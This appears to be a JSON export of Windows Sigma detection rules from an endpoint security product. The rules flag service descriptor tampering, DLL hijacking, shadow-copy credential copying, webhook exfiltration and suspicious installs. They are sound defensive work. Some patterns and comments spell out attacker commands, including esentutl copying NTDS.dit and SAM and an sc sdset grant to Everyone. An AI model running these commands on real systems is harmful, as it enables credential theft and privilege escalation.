"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072162Z",
"creation_date": "2026-03-23T11:45:34.072164Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072168Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://0xv1n.github.io/posts/scmanager/",
"https://pentestlab.blog/2023/03/20/persistence-service-control-manager/",
"https://attack.mitre.org/techniques/T1543/003/",
"https://lolbas-project.github.io/lolbas/Binaries/Sc/"
],
"name": "t1543_003_scmanager_security_descriptor_persistence.yml",
"content": "title: Suspicious Service's Security Descriptor Modification\nid: 8561d1d1-ea2a-4b93-a802-bdc392662355\ndescription: |\n Detects a suspicious modification of a service's security descriptor to allow unprivileged users to interact with this service.\n For example, adversaries can make this change on the service-control manager service (scmanager) to be able to create malicious services that will run with SYSTEM privileges even from a non-admin account.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://0xv1n.github.io/posts/scmanager/\n - https://pentestlab.blog/2023/03/20/persistence-service-control-manager/\n - https://attack.mitre.org/techniques/T1543/003/\n - https://lolbas-project.github.io/lolbas/Binaries/Sc/\ndate: 2023/08/24\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1543.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Sc\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'sc.exe'\n CommandLine|contains|all:\n - ' sdset '\n - ' D:(A;;KA;;;WD)'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8561d1d1-ea2a-4b93-a802-bdc392662355",
"rule_name": "Suspicious Service's Security Descriptor Modification",
"rule_description": "Detects a suspicious modification of a service's security descriptor to allow unprivileged users to interact with this service.\nFor example, adversaries can make this change on the service-control manager service (scmanager) to be able to create malicious services that will run with SYSTEM privileges even from a non-admin account.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2023-08-24",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "85976596-5ef3-4f79-a56a-43f6e25c2aee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594180Z",
"creation_date": "2026-03-23T11:45:34.594183Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594191Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_unlodctr.yml",
"content": "title: DLL Hijacking via unlodctr.exe\nid: 85976596-5ef3-4f79-a56a-43f6e25c2aee\ndescription: |\n Detects potential Windows DLL Hijacking via unlodctr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'unlodctr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\loadperf.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "85976596-5ef3-4f79-a56a-43f6e25c2aee",
"rule_name": "DLL Hijacking via unlodctr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via unlodctr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "85ff5382-3f31-48c8-baa5-9421a4b720be",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082285Z",
"creation_date": "2026-03-23T11:45:34.082287Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082292Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wsreset.yml",
"content": "title: DLL Hijacking via wsreset.exe\nid: 85ff5382-3f31-48c8-baa5-9421a4b720be\ndescription: |\n Detects potential Windows DLL Hijacking via wsreset.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wsreset.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\licensemanagerapi.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "85ff5382-3f31-48c8-baa5-9421a4b720be",
"rule_name": "DLL Hijacking via wsreset.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wsreset.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8610a64e-eb0f-436c-b21d-33f757ea41f0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074625Z",
"creation_date": "2026-03-23T11:45:34.074627Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074632Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Esentutl/",
"https://attack.mitre.org/techniques/T1003/003/",
"https://attack.mitre.org/software/S0404/"
],
"name": "t1003_003_copying_sensitive_files_with_esentutl.yml",
"content": "title: Sensitive Files Copied via esentutl.exe\nid: 8610a64e-eb0f-436c-b21d-33f757ea41f0\ndescription: |\n Detects the execution of the legitimate esentutl.exe Windows binary, a command-line tool that provides database utilities for the Windows Extensible Storage Engine.\n This binary can be used as a LOLBin in order to copy sensitive files (e.g NTDS.dit, SAM) from Volume Shadow Copies.\n It is recommended to analyze the process responsible for the execution of esentutl.exe, as well as to investigate files that were copied from the VSS and identify possibly stolen credentials or sensitive material.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Esentutl/\n - https://attack.mitre.org/techniques/T1003/003/\n - https://attack.mitre.org/software/S0404/\ndate: 2021/08/24\nmodified: 2025/09/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.003\n - attack.defense_evasion\n - attack.t1006\n - attack.s0404\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Esentutl\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.VolumeShadowCopy\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\esentutl.exe'\n - OriginalFileName: 'esentutl.exe'\n selection_2:\n # esentutl.exe /y /vss c:\\windows\\ntds\\ntds.dit /d c:\\folder\\ntds.dit\n # esentutl.exe /y /vss c:\\Windows\\system32\\config\\SAM /d c:\\folder\\SAM\n CommandLine|contains|all:\n - ' /y '\n - ' /vss '\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8610a64e-eb0f-436c-b21d-33f757ea41f0",
"rule_name": "Sensitive Files Copied via esentutl.exe",
"rule_description": "Detects the execution of the legitimate esentutl.exe Windows binary, a command-line tool that provides database utilities for the Windows Extensible Storage Engine.\nThis binary can be used as a LOLBin in order to copy sensitive files (e.g NTDS.dit, SAM) from Volume Shadow Copies.\nIt is recommended to analyze the process responsible for the execution of esentutl.exe, as well as to investigate files that were copied from the VSS and identify possibly stolen credentials or sensitive material.\n",
"rule_creation_date": "2021-08-24",
"rule_modified_date": "2025-09-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.003",
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "86213fd2-3e42-47e8-b6ae-b6ab6da0c1ea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625263Z",
"creation_date": "2026-03-23T11:45:34.625265Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625269Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402",
"https://www.zscaler.com/blogs/security-research/steal-it-campaign",
"https://attack.mitre.org/techniques/T1567/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1567_webhook_dns_request.yml",
"content": "title: DNS Resolution of a Webhook Service\nid: 86213fd2-3e42-47e8-b6ae-b6ab6da0c1ea\ndescription: |\n Detects a DNS resolution request of a webhook service such as webhook.site.\n These services allow for automatic logging of the requests they receive and can be configured to reply custom responses.\n Attackers can use such services to exfiltrate stolen data stealthfully, or to host and deliver malicious payloads.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402\n - https://www.zscaler.com/blogs/security-research/steal-it-campaign\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2023/09/07\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1567\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName: 'webhook.site'\n\n filter_browser:\n ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'librewolf.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'zen.exe'\n\n filter_opera:\n ProcessDescription: 'Opera Internet Browser'\n ProcessSigned: 'true'\n ProcessSignature: 'Opera Norway AS'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: 
'?:\\Windows\\System32\\services.exe'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_webthreatdefense:\n ProcessCommandLine: '?:\\Windows\\system32\\svchost.exe -k WebThreatDefense -p -s webthreatdefsvc'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_trellix:\n # C:\\Program Files\\McAfee\\Endpoint Security\\Adaptive Threat Protection\\mfeatp.exe\n ProcessDescription: 'Trellix Adaptive Threat Protection Service'\n ProcessSigned: 'true'\n ProcessSignature: 'MUSARUBRA US LLC'\n\n exclusion_intellijidea:\n ProcessParentImage|endswith: '\\IntelliJ IDEA *\\bin\\idea64.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'JetBrains s.r.o.'\n\n exclusion_nexthink:\n # C:\\Program Files\\Nexthink\\Collector\\Collector\\nxtsvc.exe\n ProcessOriginalFileName: 'nxtsvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NEXThink S.A.'\n\n exclusion_postman:\n ProcessImage|endswith: '\\Postman.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Postman, Inc.'\n\n exclusion_docker:\n ProcessOriginalFileName: 'com.docker.backend.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Docker Inc'\n\n exclusion_zen_browser:\n ProcessOriginalFileName: 'zen.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Open Source Developer, OSCAR GONZALEZ MORENO'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "86213fd2-3e42-47e8-b6ae-b6ab6da0c1ea",
"rule_name": "DNS Resolution of a Webhook Service",
"rule_description": "Detects a DNS resolution request of a webhook service such as webhook.site.\nThese services allow for automatic logging of the requests they receive and can be configured to reply with custom responses.\nAttackers can use such services to exfiltrate stolen data stealthily, or to host and deliver malicious payloads.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2023-09-07",
"rule_modified_date": "2025-12-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1567"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "864c4117-8c10-4947-a5c1-127c857ebf9c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084099Z",
"creation_date": "2026-03-23T11:45:34.084101Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084106Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/",
"https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web",
"https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/",
"https://attack.mitre.org/techniques/T1189/"
],
"name": "t1189_appinstaller_suspicious_url.yml",
"content": "title: Package Installed via AppInstaller from the Internet\nid: 864c4117-8c10-4947-a5c1-127c857ebf9c\ndescription: |\n Detects URL requests performed by AppInstaller in order to install a remote application.\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\n - https://attack.mitre.org/techniques/T1189/\ndate: 2023/12/28\nmodified: 2025/03/12\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1189.001\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n ProcessOriginalFileName: 'AppInstaller.exe'\n ProcessCommandLine|contains: '-ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca'\n\n exclusion_knownurl:\n RequestUrlHost:\n - 'download.mytobiidynavox.com' # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\n - 'windbg.download.prss.microsoft.com' # windbg.appinstaller\n - 'languagetool.org' # Languagetool.Packaging_0.5.3.5_x64.msixbundle\n - 'staticcdn.duckduckgo.com' # DuckDuckGo_0.61.5.0.msixbundle\n - 'keepersecurity.com'\n - 'data-edge.smartscreen.microsoft.com'\n - 'ping-edge.smartscreen.microsoft.com'\n - 'dl-edge.smartscreen.microsoft.com'\n - 'download.shapr3d.com'\n - 'cdn.files.community'\n 
- 'crl?.digicert.com'\n - 'cacerts.digicert.com'\n - 'ocsp.digicert.com'\n - 'ocsp.sectigo.com'\n - 'crl.comodoca.com'\n - 'ocsp.comodoca.com'\n - 'ocsp.globalsign.com'\n - 'ocsp.entrust.net'\n - 'crls.ssl.com'\n - 'ocsps.ssl.com'\n - 'oneocsp.microsoft.com'\n - 'ocsp.*.amazontrust.com'\n - 'cdn.flexibits.com'\n - 'www.microsoft.com'\n - 'crl.microsoft.com'\n - 'go.microsoft.com'\n - 'download.microsoft.com'\n - 'c.pki.goog'\n - 'o.ss2.us'\n - 'crl.certum.pl'\n - 'huddlysoftware.blob.core.windows.net' # https://support.huddly.com/what-domains-are-used-for-software-upgrades/\n - 'msixhero.net'\n - 'rsu.bmw.de'\n - '*.lencr.org'\n - 'appinstaller.xelion.com'\n - 'download.keepersecurity.com'\n - 'www.compositeurdigital.com'\n - 'dl.meraki.net'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "864c4117-8c10-4947-a5c1-127c857ebf9c",
"rule_name": "Package Installed via AppInstaller from the Internet",
"rule_description": "Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from the Internet.\nMicrosoft disabled installation of remote packages by default in late December 2023, but it can still be enabled via a group policy configuration.\nIt is recommended to check whether the accessed URL corresponds to a known and legitimate application and whether suspicious commands have been launched during the installation process.\n",
"rule_creation_date": "2023-12-28",
"rule_modified_date": "2025-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1189.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8667c4cc-362c-4054-a0ce-f7d2982de46a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607511Z",
"creation_date": "2026-03-23T11:45:34.607515Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607522Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties",
"https://www.reliaquest.com/blog/double-extortion-attack-analysis/",
"https://securelist.com/toddycat-keep-calm-and-check-logs/110696/",
"https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
"https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1204_002_suspicious_folder_execution.yml",
"content": "title: Process Executed From a Suspicious Folder\nid: 8667c4cc-362c-4054-a0ce-f7d2982de46a\ndescription: |\n Detects execution of a process from a suspicious folder.\n Adversaries may try to write to the Windows directory in order to bypass security features. Some of the folders in this directory are writable without elevated privileges.\n It is recommended to check the executed process and its parents/children for malicious behavior.\nreferences:\n - https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties\n - https://www.reliaquest.com/blog/double-extortion-attack-analysis/\n - https://securelist.com/toddycat-keep-calm-and-check-logs/110696/\n - https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\n - https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/07/23\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessImage|startswith:\n - '?:\\Windows\\Prefetch\\'\n - '?:\\Windows\\Tasks\\'\n - '?:\\Windows\\system32\\Tasks\\'\n - '?:\\Windows\\debug\\'\n - '?:\\Windows\\tracing\\'\n - '?:\\Windows\\help\\'\n - '?:\\Windows\\logs\\'\n - '?:\\Windows\\Fonts\\'\n - '?:\\Perflogs\\'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8667c4cc-362c-4054-a0ce-f7d2982de46a",
"rule_name": "Process Executed From a Suspicious Folder",
"rule_description": "Detects execution of a process from a suspicious folder.\nAdversaries may try to write to the Windows directory in order to bypass security features. Some of the folders in this directory are writable without elevated privileges.\nIt is recommended to check the executed process and its parents/children for malicious behavior.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1036.005",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "867512a0-7df8-460e-a3f5-0adf633ba816",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
